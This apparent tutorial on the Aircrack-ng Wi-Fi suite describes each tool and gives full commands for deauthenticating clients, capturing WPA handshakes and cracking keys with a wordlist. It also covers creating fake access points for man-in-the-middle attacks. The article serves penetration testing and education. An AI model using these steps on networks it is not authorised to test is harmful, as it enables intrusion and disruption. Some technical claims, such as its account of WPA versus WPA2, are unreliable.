Aircrack-ng Hacks and Enhances Wi-Fi Network Security
Disclaimer:?Hacking, or even scanning a system without permission holds legal penalties, including jail time for violating the Computer Fraud & Abuse Act. Taking permission is imminent - No exceptions. This tutorial is purely educational and is meant to help you defend your networks better.?
Aircrack is more of an offensive tool that allows you to attack, gain access and defend WiFi networks. Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. It is used by ethical hackers and security professionals to test the security of wireless networks. Aircrack-ng is primarily a command-line tool, but many GUIs have taken advantage of this feature. It works on Linux, Windows, macOS, FreeBSD, OpenBSD, NetBSD, Solaris, and eComStation 2. Aircrack-ng is preinstalled on Kali Linux. It is the best-known tool available for cracking WEP and WPA-PSK in Windows. Therefore, knowing how to use AirCrack and is associated tools is important for the penetration tester. Aircrack-ng is primarily designed to work with the WEP (Wired Equivalent Privacy) and WPA/WPA2 (Wi-Fi Protected Access) encryption protocols. It’s primary purpose is to help ethical hackers and security professionals test the security of wireless networks by cracking WEP and WPA keys, creating fake access points, capturing and analyzing network traffic, and performing various other network-based attacks. It is used to assess the security posture of your wireless network, identify vulnerabilities, and test the strength of your network's encryption. Additionally, Aircrack-ng can be used to identify rogue access points, simulate various attack scenarios, and perform penetration testing tasks.?
Components of Aircrack-ng:?
Airmon-ng: It is used to enable monitor mode on a wireless adapter, allowing you to capture network traffic. It has the modality that allows your wireless adapter to listen to all the Wi-Fi traffic in the air, even outside of the network your device belongs to. This is crucial for capturing packets, analyzing network traffic, and injecting packets into the target network when needed. It sets the stage for using other tools in the Aircrack-ng suite, such as airodump-ng, aireplay-ng, and aircrack-ng itself.?
?Monitor Mode is the status When your device is able to receive all packets that are in range of the WiFi adapter, even if they aren’t addressed to your machine’s MAC address while managed mode is when device is able to receive all packets directed to specific MAC Adddress. Once mode is established, the wireless test security may then be performed. This begins by identifying the interface name of your wireless adapter (e.g., wlan0) using the ifconfig command and iwconfig. Once you have the interface name, you can enable monitor mode with the airmon-ng start command followed by the interface name.?
Airodump-ng: It is used after Airmon-ng mode is already in monitor mode. It Captures network traffic, focusing on identifying wireless networks and capturing data packets.When packets are already captured, the network can be analyzed, identify devices that are connected, and obtain as many as possible of all security information, such as encryption keys and handshakes information. It allows you to gather valuable information about the target network and its clients, which will help you better understand the network's structure and identify potential vulnerabilities. Using airodump-ng involves executing the tool with the monitoring interface (e.g., wlan0mon) and specifying various parameters such as the channel to monitor, the BSSID to filter, and the output file prefix for the captured data. Once started, airodump-ng will display live information about the networks and clients it detects.?
When Airodump-ng is effectively used, gathering essential data (such as AP and client MAC addresses) for further analysis and set yourself up for more advanced attacks or security assessments using other tools in the Aircrack-ng suite.?
Airgraph-ng: It generates graphical representations of network traffic based on captured data, providing a visual representation of network activity and their associated clients. These visualizations can help you better understand the relationships between networks and devices, making it easier to identify potential targets and vulnerabilities. Airgraph-ng is being used after capturing packets with airodump-ng. Captured data in a graphical format helps to gain a clearer understanding of the network's structure, which can help you plan and execute more targeted and effective attacks or security assessments. It provides input file (CSV) generated by airodump-ng and specifying an output file for the generated graph. It helps to visually analyze the relationships between networks and clients, helping you identify potential targets and better understand the overall structure of the wireless environment. ?
Aireplay-ng: "Hackplay" begins here. This phase Creates network traffic and performs various attacks, such as deauthentication and packet injection, to manipulate network behavior. This can be employed to speed up the cracking process, force client disconnections, or test network security by injecting custom packets. This attack sends disassocate packets to one or more clients which are currently associated with a particular access point. Disassociating clients can be done for a number of reasons:?
You would use aireplay-ng after capturing packets with airodump-ng and analyzing the network traffic. Recovering a hidden ESSID. This is an ESSID which is not being broadcast. Another term for this is “cloaked”.?
Capturing WPA/WPA2 handshakes by forcing clients to reauthenticate. Generate ARP requests (Windows clients sometimes flush their ARP cache when disconnected). Of course, this attack is totally useless if there are no associated wireless client or on fake authentications. A deauth or deauthentication attack disrupts connections between users and Wi-Fi access points. The attackers force devices to lose access and then reconnect to a network they control to accomplish a Wi-Fi deauthentication attack:?
Find the MAC address of the target network's access point.?
Find the MAC address of the target client you wish to disconnect.?
Change the MAC address of your wireless interface to match the target client's MAC address.?
Send a request to the target network's access point, requesting to disconnect from the network.?
Change the MAC address of your wireless interface to match the target network's access point.?
Send a request to target client, requesting them to disconnect from the network.?
This process is very cumbersome, but fortunately it can be automated using aireplay-ng, which is part of the Aircrack-ng suite.?
run aireplay-ng in your terminal. Here is an example:?
aireplay-ng --deauth 1000 -a 00:11:22:33:44:55 -c 00:AA:BB:CC:DD:EE wlan0?
OR?
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:AE:CE:9D ath0?
Where:?
-0 means deauthentication?
1 is the number of deauths to send (you can send multiple if you wish)?
-a 00:14:6C:7E:40:80 is the MAC address of the access point?
-c 000:0F:B5:AE:CE:9D is the MAC address of the client you are deauthing?
ath0 is the interface name?
Here is typical output:?
??
12:35:25? Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9?
12:35:25? Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]?
Let's break down the parameters:?
--deauth to specify you wish to run a deauthenticate attack.?
1000 is the number of requests you wish to send. You can send one or multiple. In this example we are sending 1000. The larger the number, the longer the attack will last.?
-a 00:11:22:33:44:55 is the MAC address of the target access point.?
-c 00:AA:BB:CC:DD:EE is the MAC address of the target client.?
wlan0 is the wireless interface you are running in monitor mode.?
?When you execute a deauthentication (deauth) attack with aireplay-ng, the tool sends a series of deauthentication frames to the target device and access point. These frames are designed to mimic legitimate management packets from the access point or the client device, instructing them to disconnect from each other. As a result, the target device is disconnected from the WiFi network, forcing it to re-establish the connection, which can be used to capture the handshake.?
Using aireplay-ng involves specifying the attack type, target network, and relevant parameters depending on the attack. You may need to provide the monitoring interface (e.g., wlan0mon) and the MAC addresses of the target access point and client devices. When using aireplay-ng effectively, you can manipulate wireless network traffic, test network security, and gather additional information to aid in cracking WiFi encryption or identifying vulnerabilities. ?
Aircrack-ng: The flagship tool that cracks WEP and WPA/WPA2 encryption keys, allowing you to assess the strength of your network's security. It employs various algorithms and techniques to recover encryption keys, enabling you to gain unauthorized access to a wireless network or verify the strength of your own network's security. When having adequate information, like a WPA handshake or a sufficient number of WEP IVs (Initialization Vector), it can use aircrack-ng to try a dictionary to recover the key. It entails giving the attack parameters such as the key length for brute-force attacks as well as the collected data. Using aircrack-ng involves providing the captured data (in .cap format) and specifying the attack parameters, such as the dictionary file or the key length for brute-force attacks. The tool will then analyze the captured data and attempt to recover the encryption key.?
Airbase-ng: Creates fake access points for testing network security, performing man-in-the-middle attacks, or social engineering purposes. This tool incorporates handshake capture, packet manipulation, and traffic injection attacks as well as others.It supports various attack types, including deauthentication, fake authentication, and ARP request injection, which can help facilitate different stages of wireless security assessments or ethical hacking operations. By emulating legitimate access points, airbase-ng can trick nearby devices into connecting to the fake AP, allowing you to monitor or manipulate their network traffic. Use airbase-ng after gathering information about the target network and clients using tools like airodump-ng and aireplay-ng. Once you have identified a suitable target, airbase-ng can be employed to create a fake access point, luring unsuspecting users into connecting and potentially revealing sensitive information.?
Encrypting and decrypting packets: Airbase-ng can encrypt and decrypt packets. ?
Filtering packets: Airbase-ng can filter packets by SSID or client MAC addresses. ?
Manipulating and resending packets: Airbase-ng can manipulate and resend packets. ?
Airdecap-ng:?
With this tool, you can decrypt WEP/WPA/WPA2 capture files. It is also used to remove the wireless headers from an unencrypted wireless capture. This tool is particularly useful if you have an encrypted capture file you wish to scan for usernames, passwords, and other valuable data.??
Airdrop-ng:?
Airdrop-ng is a program used to de authenticate users from access points. It uses rule based de authentication techniques that can be MAC address, type of hardware, etc?
Airolib-ng:?
This is a tool designed to store and manage ESSID and password lists. calculate their Pairwise Master Keys (PMK’s) and use them in WPA/WPA2 cracking.?
?Airtun-ng:This tool creates a virtual tunnel interface. It has two basic functions. They are allowing all encrypted traffic to be monitored for wireless interface detection system (WIDS) and injecting arbitrary traffic into a network.?
?Besside-ng: It is used to automatically crack WEP and WPA networks . See how to automatically crack WEP and WPA networks with Besside. ?
领英推荐
Dcrack-ng:It is used to distribute WPA2 / PSK cracking process across multiple servers.?
?Easside-ng: This tool is a magic tool that allows you to communicate with a WEP access point without knowing its WEP key. It sends out transmissions over a WEP network without using the encryption system of the network. ?
Packetforge-ng: This tool is used to create encrypted packets to be used for packet injection. Using this tool, we can create various types of packets like ARP requests, UDP, ICMP and custom packets.?
Makeivs-ng creates an IVS file, given a WEP key, for use in test scenarios.?
Packetforge-ng: This tool is used to create encrypted packets to be used for packet injection. Using this tool, we can create various types of packets like ARP requests, UDP, ICMP and custom packets. It encrypts packets that follow the encryption system used in a stream and transmits those packets.??Wesside-ng: It is another auto-magic tool that uses a variety of techniques to get the WEP key. It is the central cracking module that determines the encryption key needed to access a WEP-protected network.?
?Buddy-ng: It is a receiver program that works with easside-ng.?
Airolib-ng manages lists of ESSIDs and passwords for use in encryption and authentication/credentials cracking.?
Airserv-ng allows access to the wireless NIC from other computers.?
wpaclean – Remove excess data from a pcap file?
kstats – show statistical FMS algorithm votes for an ivs dump and a specified WEP key?
makeivs-ng – Generates initialization vectors?
The action plan is broken down into parts.?
?Download and install the latest and required dependencies and aircrack-ng?
$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev?
$ wget https://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz ? -O - | tar -xz?
$ cd aircrack-ng-1.2-rc4?
$ sudo make?
$ sudo make install?
Test you are near WiFi networks.?
$ sudo aireplay-ng --test wlan0?
?Stop all the processes that use the wireless interface and Start the wireless interface in monitor mode using the airmon-ng?
$ sudo airmon-ng check kill?
$ sudo airmon-ng start wlan0?
?Start the airodump-ng on AP channel with filter for BSSID to collect authentication handshake?
$ sudo airodump-ng mon0?
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.?
?Collect the authentication handshake for the access point we are interested in by using?
$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one??
or ??
$ sudo airodump-ng -c 1 -w kali —bssid 50:D4:F7:E5:66:F4 wlan0?
?Wait until airodump-ng captures a handshake you send a message to the wireless client saying that it is no longer associated with the AP. When you see the WPA handshake: 00:11:22:33:44:55 in the top right-hand corner of the screen.?
This means that the airodump-ng has successfully captured the handshake.?
Use the aireplay-ng to deauthenticate the wireless client?
Run the aircrack-ng to hack the WiFi password by cracking the authentication handshake?
Send deauth to broadcast:?
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 mon0 --ignore-negative-one?
Send directed deauth (attack is more effective when it is targeted):??
$ sudo aireplay-ng --deauth 100 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0 --ignore-negative-one?
?or ?
$ sudo aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0?
Crack the WPA/WPA2-PSK with the following command:???
$ aircrack-ng -w wordlist.dic -b 00:11:22:33:44:55 WPAcrack.cap?
Conclusion: With all WiFi benefits, it is also a vulnerable network capable of exposing our private information, if we are not careful.Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng. The only difference between WPA and WPA2 is that they use Rivest Cipher(RC4) and Advanced Encryption Standard(AES) encryption algorithms respectively. Both can be configured to use counter cipher block chaining mode(CCM) though. They are by far considered most secure for Wifi networks. One of the very nice features of aircrack-ng is the ability to crack WEP without any authenticated clients. If the wireless network is completely standalone and there is no traffic whatsoever going across the network, you will not be able to collect the necessary data for cracking the WEP encryption. Some modern access points and routers may employ additional security measures or features that can make them more resistant to Aircrack-ng attacks. Newer wireless protocols like WPA3 are also designed to be more secure and less vulnerable to cracking tools. To crack WiFi passwords, you need to understand how a network operates. A network usually contains several devices connected using a wired (Ethernet, Fiber, etc.) or wireless connection (WiFi, Bluetooth, etc.) to share resources. Whether you are on a wired or wireless network, one device is always considered a server. For example, if you are on a home network, the server would be the router/Access point. To connect to the internet, a Device will send a request to the router, which will, in turn, fetch what you want from the Internet. The?transmitted data between the client and the Access Point is known as Packets.?
?
References:?